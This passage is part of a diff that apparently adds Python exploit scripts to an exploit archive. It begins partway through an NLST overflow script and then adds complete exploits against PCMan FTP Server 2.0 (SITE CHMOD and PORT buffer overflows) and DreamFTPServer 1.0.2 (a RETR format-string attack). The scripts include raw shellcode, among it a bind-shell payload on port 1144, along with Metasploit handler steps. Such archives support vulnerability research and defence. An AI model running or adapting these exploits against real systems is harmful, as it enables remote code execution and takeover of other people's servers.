"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
|
||||
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
|
||||
"\xce\x7e\xdd\x9a\xef\xaa")
|
||||
|
||||
buffer= '\x90'*30 + shellcode
|
||||
buffer1= '\x41' * 2007 + ret + buffer + '\x43'*(696-len(buffer))
|
||||
print "Sending..."
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.1.43',21))
|
||||
s.recv(1024)
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS \r\n')
|
||||
s.recv(1024)
|
||||
s.send('NLST' + buffer1 + '\r\n')
|
||||
s.close()
|
45
platforms/windows/remote/40713.py
Executable file
45
platforms/windows/remote/40713.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/env python
|
||||
#-*- coding: utf-8 -*-
|
||||
|
||||
# Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command
|
||||
# Date: 04/11/2016
|
||||
# Exploit Author: Luis Noriega
|
||||
# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
|
||||
# CVE : n/a
|
||||
|
||||
import socket
|
||||
|
||||
# shellcode with metasploit:
|
||||
# msfvenom -p windows/exec CMD=calc.exe -b'\x00\x0A\x0D' -f c
|
||||
|
||||
ret = "\xD7\x30\x6B\x7E" #SHELL32.dll
|
||||
|
||||
shellcode = ("\xdb\xd6\xbf\x70\x7b\xf3\x98\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
|
||||
"\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x74\x99\x06\x64\x9c\xdf"
|
||||
"\xe9\x95\x5c\x80\x60\x70\x6d\x80\x17\xf0\xdd\x30\x53\x54\xd1"
|
||||
"\xbb\x31\x4d\x62\xc9\x9d\x62\xc3\x64\xf8\x4d\xd4\xd5\x38\xcf"
|
||||
"\x56\x24\x6d\x2f\x67\xe7\x60\x2e\xa0\x1a\x88\x62\x79\x50\x3f"
|
||||
"\x93\x0e\x2c\xfc\x18\x5c\xa0\x84\xfd\x14\xc3\xa5\x53\x2f\x9a"
|
||||
"\x65\x55\xfc\x96\x2f\x4d\xe1\x93\xe6\xe6\xd1\x68\xf9\x2e\x28"
|
||||
"\x90\x56\x0f\x85\x63\xa6\x57\x21\x9c\xdd\xa1\x52\x21\xe6\x75"
|
||||
"\x29\xfd\x63\x6e\x89\x76\xd3\x4a\x28\x5a\x82\x19\x26\x17\xc0"
|
||||
"\x46\x2a\xa6\x05\xfd\x56\x23\xa8\xd2\xdf\x77\x8f\xf6\x84\x2c"
|
||||
"\xae\xaf\x60\x82\xcf\xb0\xcb\x7b\x6a\xba\xe1\x68\x07\xe1\x6f"
|
||||
"\x6e\x95\x9f\xdd\x70\xa5\x9f\x71\x19\x94\x14\x1e\x5e\x29\xff"
|
||||
"\x5b\x90\x63\xa2\xcd\x39\x2a\x36\x4c\x24\xcd\xec\x92\x51\x4e"
|
||||
"\x05\x6a\xa6\x4e\x6c\x6f\xe2\xc8\x9c\x1d\x7b\xbd\xa2\xb2\x7c"
|
||||
"\x94\xc0\x55\xef\x74\x29\xf0\x97\x1f\x35")
|
||||
|
||||
buffer = '\x90'*30 + shellcode
|
||||
buffer2 = '\x41' * 2001 + ret + buffer + '\x43'*(749-len(buffer))
|
||||
print "Sending Buffer"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
|
||||
connect = s.connect(('192.168.1.150', 21))
|
||||
s.recv(1024)
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('SITE CHMOD' + buffer2 + '\r\n')
|
||||
s.close()
|
74
platforms/windows/remote/40714.py
Executable file
74
platforms/windows/remote/40714.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env python
|
||||
#-*- coding: utf-8 -*-
|
||||
|
||||
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
|
||||
# Author: Pablo González
|
||||
# Date: 4/11/2016
|
||||
# Software: PCMan 2.0
|
||||
# Tested on: Windows XP Profesional SP3 Spanish x86
|
||||
|
||||
import socket
|
||||
|
||||
print "Creating malicious input!"
|
||||
|
||||
junk = '\x41'*2007
|
||||
ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7
|
||||
nops = '\x90'*20
|
||||
|
||||
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
|
||||
#put shellcode in variable 'sc'
|
||||
|
||||
sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
|
||||
"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
|
||||
"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
|
||||
"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
|
||||
"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
|
||||
"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
|
||||
"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
|
||||
"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
|
||||
"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
|
||||
"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
|
||||
"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
|
||||
"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
|
||||
"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
|
||||
"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
|
||||
"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
|
||||
"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
|
||||
"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
|
||||
"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
|
||||
"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
|
||||
"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
|
||||
"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
|
||||
"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
|
||||
"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
|
||||
"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
|
||||
|
||||
buffer= junk + ret + nops + sc
|
||||
|
||||
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
ip = raw_input('Give me Remote IP Address:')
|
||||
connect=s.connect((ip,21))
|
||||
banner = s.recv(1024)
|
||||
print banner
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS\r\n')
|
||||
s.recv(1024)
|
||||
#Sending input PORT command (Exploitation is coming)
|
||||
s.send('PORT' + buffer + '\r\n')
|
||||
s.close()
|
||||
|
||||
#Metasploit exploit/multi/handler or nc <ip> <port> :D
|
||||
#
|
||||
# For exploit/multi/handler
|
||||
#
|
||||
# use exploit/multi/handler
|
||||
# set PAYLOAD windows/shell_bind_tcp
|
||||
# set RHOST <ip>
|
||||
# set LPORT 1144
|
||||
# exploit
|
||||
# ...
|
||||
# Got it!
|
||||
|
||||
print "Got it? :D"
|
||||
|
58
platforms/windows/remote/40715.py
Executable file
58
platforms/windows/remote/40715.py
Executable file
|
@ -0,0 +1,58 @@
|
|||
import socket
|
||||
import os
|
||||
import sys
|
||||
|
||||
print '''
|
||||
|
||||
##############################################
|
||||
# Created: ScrR1pTK1dd13 #
|
||||
# Name: Greg Priest #
|
||||
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
|
||||
##############################################
|
||||
|
||||
# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
|
||||
# Date: 2016.11.04
|
||||
# Exploit Author: Greg Priest
|
||||
# Version: DreamFTPServer1.0.2
|
||||
# Tested on: Windows7 x64 HUN/ENG Professional
|
||||
'''
|
||||
|
||||
ip = raw_input("Target ip: ")
|
||||
port = 21
|
||||
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
|
||||
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
|
||||
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
|
||||
|
||||
#shellcode calc.exe
|
||||
shellcode =(
|
||||
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
||||
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
||||
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
||||
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
||||
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
||||
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
||||
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
||||
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
||||
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
||||
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
||||
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
||||
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
||||
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
||||
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
||||
|
||||
remotecode = overflow + nop + shellcode + '\r\n'
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect((ip ,port))
|
||||
s.recv(1024)
|
||||
s.send('USER anonymous\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASSW hacker@hacker.net\r\n')
|
||||
s.recv(1024)
|
||||
print remotecode
|
||||
print '''
|
||||
Successfull Exploitation!
|
||||
'''
|
||||
message = 'RETR ' + remotecode
|
||||
s.send(message)
|
||||
s.recv(1024)
|
||||
s.close
|
Loading…
Add table
Reference in a new issue